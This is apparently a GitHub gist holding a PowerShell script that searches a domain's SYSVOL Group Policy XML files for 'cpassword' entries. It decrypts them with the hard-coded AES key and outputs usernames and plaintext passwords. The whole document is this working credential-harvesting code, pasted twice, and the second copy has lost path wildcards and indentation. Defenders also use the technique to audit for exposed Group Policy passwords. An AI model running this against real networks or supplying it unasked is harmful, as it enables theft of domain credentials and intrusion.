alacerda/gist:48ef36a42b86a5d81b83937ee00a2a2d

## gistfile1.txt
$pwdfoundgpo = New-Object 'System.Collections.Generic.List[System.Object]'
    $DomainName = ""
    $Items = Get-ChildItem "\\$DomainName\SYSVOL\*\Policies" -recurse -Filter *.xml
    foreach ($XMLFileName in $Items){

        [string]$XMLContent = Get-content ($XMLFileName.FullName)

        if($XMLContent.Contains("cpassword")){

            [string]$Cpassword = [regex]::matches($XMLContent,'(cpassword=).+?(?=\")')
            [string] $UserName = [regex]::matches($XMLContent,'(userName=).+?(?=\")')

            $Cpassword = $Cpassword.split('(\")')[1]
            $UserName = $UserName.split('(\")')[1]

            if($Cpassword){

                $Mod = ($Cpassword.length % 4)
                switch ($Mod) {
                    '1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
                    '2' {$Cpassword += ('=' * (4 - $Mod))}
                    '3' {$Cpassword += ('=' * (4 - $Mod))}
                }
                $Base64Decoded = [Convert]::FromBase64String($Cpassword)
                $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider

                [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                                     0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
                $AesIV = New-Object Byte[]($AesObject.IV.Length)
                $AesObject.IV = $AesIV
                $AesObject.Key = $AesKey
                $DecryptorObject = $AesObject.CreateDecryptor()
                [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)

                $Password = [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
                [string]$GPOguid = [regex]::matches($XMLFileName.DirectoryName,'(?<=\{).+?(?=\})')
                $GPODetail = Get-GPO -guid $GPOguid

                $obj = [PSCustomObject]@{

                     'Name'     = $GPODetail.DisplayName
                     'Username' = $UserName
                     'Password' = $Password
                     'XML File' = $XMLFileName
                }

                $pwdfoundgpo.Add($obj)
            }
        }
    }
    $pwdfoundgpo
	$pwdfoundgpo = New-Object 'System.Collections.Generic.List[System.Object]'
	$DomainName = ""
	$Items = Get-ChildItem "\\$DomainName\SYSVOL\\Policies" -recurse -Filter .xml
	foreach ($XMLFileName in $Items){

	[string]$XMLContent = Get-content ($XMLFileName.FullName)

	if($XMLContent.Contains("cpassword")){

	[string]$Cpassword = [regex]::matches($XMLContent,'(cpassword=).+?(?=\")')
	[string] $UserName = [regex]::matches($XMLContent,'(userName=).+?(?=\")')

	$Cpassword = $Cpassword.split('(\")')[1]
	$UserName = $UserName.split('(\")')[1]

	if($Cpassword){

	$Mod = ($Cpassword.length % 4)
	switch ($Mod) {
	'1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
	'2' {$Cpassword += ('=' * (4 - $Mod))}
	'3' {$Cpassword += ('=' * (4 - $Mod))}
	}
	$Base64Decoded = [Convert]::FromBase64String($Cpassword)
	$AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider

	[Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
	0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
	$AesIV = New-Object Byte[]($AesObject.IV.Length)
	$AesObject.IV = $AesIV
	$AesObject.Key = $AesKey
	$DecryptorObject = $AesObject.CreateDecryptor()
	[Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)

	$Password = [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
	[string]$GPOguid = [regex]::matches($XMLFileName.DirectoryName,'(?<=\{).+?(?=\})')
	$GPODetail = Get-GPO -guid $GPOguid

	$obj = [PSCustomObject]@{

	'Name' = $GPODetail.DisplayName
	'Username' = $UserName
	'Password' = $Password
	'XML File' = $XMLFileName
	}

	$pwdfoundgpo.Add($obj)
	}
	}
	}
	$pwdfoundgpo